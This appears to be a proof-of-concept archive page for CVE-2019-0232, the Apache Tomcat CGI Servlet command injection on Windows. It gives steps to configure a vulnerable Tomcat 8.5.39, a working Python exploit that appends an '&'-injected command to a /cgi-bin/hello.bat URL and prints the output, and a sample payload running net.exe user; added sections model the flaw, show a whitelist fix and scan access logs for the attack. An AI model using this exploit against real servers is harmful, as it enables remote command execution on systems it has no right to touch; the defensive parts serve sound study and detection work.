Related vulnerability
Title:
Apache Tomcat OS command injection vulnerability
(CVE-2019-0232)
Description: Apache Tomcat is a lightweight web application server from the Apache Software Foundation. It implements support for Servlets and JavaServer Pages (JSP). The CGI Servlet in Apache Tomcat 9.0.0.M1 through 9.0.17, 8.5.0 through 8.5.39 and 7.0.0 through 7.0.93 has an OS command injection vulnerability when Tomcat runs on Windows with the CGI Servlet enabled and its `enableCmdLineArguments` option turned on: the decoded query-string arguments are handed to the CGI script as a single Windows command line, so metacharacters such as `&` in them are interpreted by cmd.exe when the target is a `.bat` file. A remote attacker can exploit this to execute arbitrary commands. Fixed in 9.0.18, 8.5.40 and 7.0.94, which also disable `enableCmdLineArguments` by default.
Description
Apache Tomcat Remote Code Execution on Windows - CGI-BIN
Introduction
# CVE-2019-0232
Apache Tomcat Remote Code Execution on Windows - CGI-BIN

# Usage:
```
Usage: python CVE-2019-0232.py url cmd
```


# Test environment:
```
jdk8
apache-tomcat-8.5.39
https://archive.apache.org/dist/tomcat/tomcat-8/v8.5.39/bin/apache-tomcat-8.5.39.zip
```
## Setting up the vulnerable environment: edit the configuration files under conf to enable CGI, then start the Tomcat server
#### Reference: https://github.com/pyn3rd/CVE-2019-0232
In the stock 8.5.39 `conf\web.xml` both the `cgi` servlet definition below and its `<servlet-mapping>` (`<servlet-name>cgi</servlet-name>` with `<url-pattern>/cgi-bin/*</url-pattern>`) are commented out; uncomment both, otherwise `/cgi-bin/hello.bat` never reaches the CGI Servlet. Note that `enableCmdLineArguments` is not set here: in 8.5.39 it defaults to true, which is the precondition for this bug. `executable` is emptied so the script is launched directly instead of through the default `perl`, and `cgiPathPrefix` is relative to the web application root, so the exploit URL `/cgi-bin/hello.bat` assumes a `hello.bat` placed at `webapps\ROOT\WEB-INF\cgi-bin\hello.bat`.
#### apache-tomcat-8.5.39\conf\web.xml
```
<servlet>
<servlet-name>cgi</servlet-name>
<servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
<init-param>
<param-name>debug</param-name>
<param-value>0</param-value>
</init-param>
<init-param>
<param-name>cgiPathPrefix</param-name>
<param-value>WEB-INF/cgi-bin</param-value>
</init-param>
<init-param>
<param-name>executable</param-name>
<param-value></param-value>
</init-param>
<load-on-startup>5</load-on-startup>
</servlet>
```
#### apache-tomcat-8.5.39\conf\context.xml
The CGI Servlet only initialises in a privileged web application, hence `privileged="true"` on the `<Context>`; setting it in the global `conf\context.xml` applies it to every deployed application.
```
<Context privileged="true">
<!-- Default set of monitored resources. If one of these changes, the -->
<!-- web application will be reloaded. -->
<WatchedResource>WEB-INF/web.xml</WatchedResource>
<WatchedResource>${catalina.base}/conf/web.xml</WatchedResource>
<!-- Uncomment this to disable session persistence across Tomcat restarts -->
<!--
<Manager pathname="" />
-->
</Context>
```
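To see why this configuration is exploitable, the following Python models the path a request takes on an unpatched 8.5.39 and contrasts it with a whitelist check of the kind the fixed releases add. It is an added illustration, not code from this page, from pyn3rd's repository or from Tomcat itself: the join performed by the JRE and the parsing done by cmd.exe are deliberately simplified models, and the `SAFE_ARG` pattern is an assumption that only shows the approach, not the default value Tomcat ships for `cmdLineArgumentsDecoded`.

```python
import re
from urllib.parse import unquote

# cmd.exe metacharacters: command separator, pipe, redirection, escape.
CMD_METACHARS = set('&|<>^')

# Illustrative whitelist for decoded arguments. The fixed releases validate
# arguments against a configurable pattern (cmdLineArgumentsDecoded); this
# regex is an assumption that shows the approach, not Tomcat's default.
SAFE_ARG = re.compile(r'[A-Za-z0-9._/-]+')


def query_to_argv(query_string):
    """Model of the CGI 'indexed query' rule (RFC 3875 section 4.4), which is
    what CGIServlet applies when enableCmdLineArguments is true: a query with
    no '=' is split on '+' and each piece is percent-decoded into one argv
    entry; a query containing '=' is a form query and yields no arguments."""
    if not query_string or '=' in query_string:
        return []
    return [unquote(piece) for piece in query_string.split('+')]


def windows_command_line(script, argv):
    """Simplified model of how the JRE builds the single command-line string a
    Windows child process receives: arguments containing whitespace are
    double-quoted, all others are appended verbatim, so a leading '&' in an
    argument survives into the string cmd.exe will parse."""
    parts = [script]
    for arg in argv:
        parts.append('"%s"' % arg if ' ' in arg else arg)
    return ' '.join(parts)


def commands_run_by_cmd(command_line):
    """Simplified model of cmd.exe, which is what runs a .bat target and treats
    an unquoted '&' as a command separator (quoting, '&&' and '||' are ignored
    on purpose). Returns the commands it would execute in order."""
    return [c.strip() for c in command_line.split('&') if c.strip()]


def args_are_safe(argv):
    """Hardened check in the spirit of the fix: accept the request only if every
    decoded argument matches the whitelist, which excludes every cmd.exe
    metacharacter as well as ':' and '\\', so a drive path is rejected too."""
    return all(SAFE_ARG.fullmatch(a) is not None
               and not (set(a) & CMD_METACHARS) for a in argv)


def simulate_vulnerable_server(query_string, script="hello.bat"):
    """What an unpatched server does with the query: (argv, commands run)."""
    argv = query_to_argv(query_string)
    return argv, commands_run_by_cmd(windows_command_line(script, argv))


if __name__ == "__main__":
    payload = "&C%3A%5CWindows%5CSystem32%5Cnet.exe+user"   # the page's payload
    argv, cmds = simulate_vulnerable_server(payload)
    print("argv handed to hello.bat:", argv)
    print("commands cmd.exe runs   :", cmds)
    print("hardened check accepts  :", args_are_safe(argv))
    print("benign 'report+2019'    :", args_are_safe(query_to_argv("report+2019")))
```

The leading `&` in the page's payload is what makes `hello.bat` run with no arguments and `C:\Windows\System32\net.exe user` run as a second command; the same query against a server that validates decoded arguments is refused before any process is started. Setting `enableCmdLineArguments` to false removes the argv path entirely, which is the simplest mitigation where CGI arguments are not needed.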
## The Python script:
```
#!/usr/bin/env python3
# CVE-2019-0232 PoC: Apache Tomcat CGIServlet command injection on Windows.
# The query string carries no '=', so the CGI Servlet treats it as command-line
# arguments (split on '+'); cmd.exe, which runs the .bat target, honours the
# injected '&' as a command separator and executes what follows it.
# Example: http://localhost:8080/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Cnet.exe+user
import sys

import requests

if len(sys.argv) != 3:
    print("Usage: python CVE-2019-0232.py url cmd")
    print("  cmd is appended as-is, URL-encoded, e.g. net.exe+user or whoami.exe")
    sys.exit(1)

url = sys.argv[1].rstrip("/")
# '&' separates the injected command from hello.bat's (empty) argument list;
# C%3A%5CWindows%5CSystem32%5C is the URL-encoded prefix C:\Windows\System32\
url_dir = "/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5C"
cmd = sys.argv[2]
vuln_url = url + url_dir + cmd

# Raw string: the banner contains backslashes that must not be escapes.
print(r'''
_______ ________ ___ ___ __ ___ ___ ___ ____ ___
/ ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ / _ \__ \|___ \__ \
| | \ \ / /| |__ ______ ) | | | || | (_) |______| | | | ) | __) | ) |
| | \ \/ / | __|______/ /| | | || |\__, |______| | | |/ / |__ < / /
| |____ \ / | |____ / /_| |_| || | / / | |_| / /_ ___) / /_
\_____| \/ |______| |____|\___/ |_| /_/ \___/____|____/____|
Apache Tomcat Remote Code Execution on Windows - CGI-BIN
By Jas502n
''')
print("Usage: python CVE-2019-0232.py url cmd")
print("The Vuln url:\n\n", vuln_url)
r = requests.get(vuln_url)
print("\nThe Vuln Response Content: \n\n", r.text)
```
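For the defensive side, this added example (not part of the original PoC or of Tomcat) scans Tomcat access log lines for the request shape the script above produces. It reproduces the server's own view of the query, so only an indexed query (no `=`) counts as arguments and percent-encoded metacharacters such as `%26` are decoded before being checked. The log lines are constructed samples in the default AccessLogValve common pattern, and the `/cgi-bin/` prefix is assumed from the servlet-mapping used on this page.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines in Tomcat's default AccessLogValve "common" pattern
# (%h %l %u %t "%r" %s %b); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Apr/2019:14:02:11 +0000] "GET /cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Cnet.exe+user HTTP/1.1" 200 312
10.0.0.7 - - [10/Apr/2019:14:02:15 +0000] "GET /cgi-bin/hello.bat?report+2019 HTTP/1.1" 200 57
10.0.0.9 - - [10/Apr/2019:14:02:20 +0000] "GET /index.jsp?id=1 HTTP/1.1" 200 1042
10.0.0.5 - - [10/Apr/2019:14:03:01 +0000] "GET /cgi-bin/hello.bat?%26whoami.exe HTTP/1.1" 200 44
10.0.0.6 - - [10/Apr/2019:14:03:09 +0000] "GET /cgi-bin/hello.bat?a=1&b=2 HTTP/1.1" 200 20
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# cmd.exe metacharacters plus the characters a Windows drive path needs; any of
# them inside an argument that reaches a .bat file is worth an alert.
SUSPICIOUS = set('&|<>^\\:')


def decoded_cgi_args(target):
    """Reproduce the server's view (RFC 3875 section 4.4): only an indexed
    query, one with no '=', becomes command-line arguments, split on '+'
    and percent-decoded. A form query such as a=1&b=2 yields no arguments,
    so its '&' is not an injection."""
    query = urlsplit(target).query
    if not query or '=' in query:
        return []
    return [unquote(piece) for piece in query.split('+')]


def scan_access_log(text, cgi_prefix="/cgi-bin/"):
    """Return one finding per request under cgi_prefix whose decoded CGI
    arguments carry cmd.exe metacharacters or Windows path characters.
    cgi_prefix must match the servlet-mapping in web.xml (assumed /cgi-bin/)."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                      # not a common-pattern access line
        target = m.group('target')
        path = urlsplit(target).path
        if not path.startswith(cgi_prefix):
            continue
        bad = [a for a in decoded_cgi_args(target) if set(a) & SUSPICIOUS]
        if bad:
            findings.append({'ip': m.group('ip'), 'time': m.group('ts'),
                             'path': path, 'args': bad,
                             'status': int(m.group('status'))})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print("%(time)s %(ip)s %(path)s status=%(status)d args=%(args)r" % f)
```

A 200 in the log does not prove the injected command ran (the `.bat` must exist and `enableCmdLineArguments` must be on), so treat a hit as a trigger for host-side review of the process tree under the Tomcat service rather than as confirmation by itself.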
## References:
https://github.com/pyn3rd/CVE-2019-0232
File snapshot
[4.0K] /data/pocs/5c5a43c1390e255c4383f47a5ffde7ea92978337
├── [258K] CVE-2019-0232.png
├── [1.0K] CVE-2019-0232.py
├── [313K] net-user.jpg
├── [2.7K] README.md
└── [274K] whoami.jpg
0 directories, 5 files
Notes
1. Accessing the original source is recommended.
2. If the source has gone offline or cannot be reached, send an e-mail to f.jinxu#gmail.com (replace # with @) to request a local snapshot.
3. Shenlong has taken a snapshot of the POC code for you; to keep it maintained in the long term, please consider paying for the local POC. Thank you for your support.